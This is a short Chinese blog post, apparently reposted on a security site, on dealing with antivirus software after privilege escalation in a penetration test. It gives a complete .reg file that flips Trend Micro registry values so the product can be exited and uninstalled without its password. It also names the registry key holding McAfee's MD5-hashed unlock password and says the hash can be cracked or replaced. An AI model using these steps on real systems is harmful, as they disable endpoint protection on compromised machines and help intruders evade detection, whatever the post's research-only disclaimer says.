渗透测试中遭遇杀毒软件

独自等待 2017年5月10日20:24:36评论434 views字数 714阅读2分22秒阅读模式

最近测试一个项目,提权时遇到了杀毒软件,N多工具都被杀掉了,虽然最后都成功提权了,但是还是或多或少的给我们提权造成了不少的麻烦,尤其是提权成功后使用cain嗅探,cain被秒杀,别提多郁闷了。这里就我提权过程中遇到的两款杀毒软件来进行一下总结,总结一下如何在提权成功后关掉这两款杀毒软件。

1、免密码关掉趋势杀毒软件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc.]
"NoPwdProtect"=dword:00000001
"Allow Uninstall"=dword:00000001

;其中【"NoPwdProtect"=dword:00000001】为退出趋势,改为【0】即可恢复,推出密码
;其中【"Allow Uninstall"=dword:00000001】为卸载趋势,改为【0】即可恢复,卸载密码

将以上内容保存为waitalone.reg,然后双击导入即可免密码退出趋势杀毒软件。

2、破解McAfee杀毒软件密码

Mcafee

McAfee杀毒软件的用户界面解锁密码保存于以下注册表路径:

HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection

其实子键UIP就是杀毒软件用户界面解锁密码,是md5密文,大家直接在cmd5上面解密即可,如果解不出来的话就自己生成一个替换即可。

参考文章:

http://www.jb51.net/hack/33933.html



from www.waitalone.cn.thanks for it.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月10日20:24:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试中遭遇杀毒软件https://cn-sec.com/archives/50135.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息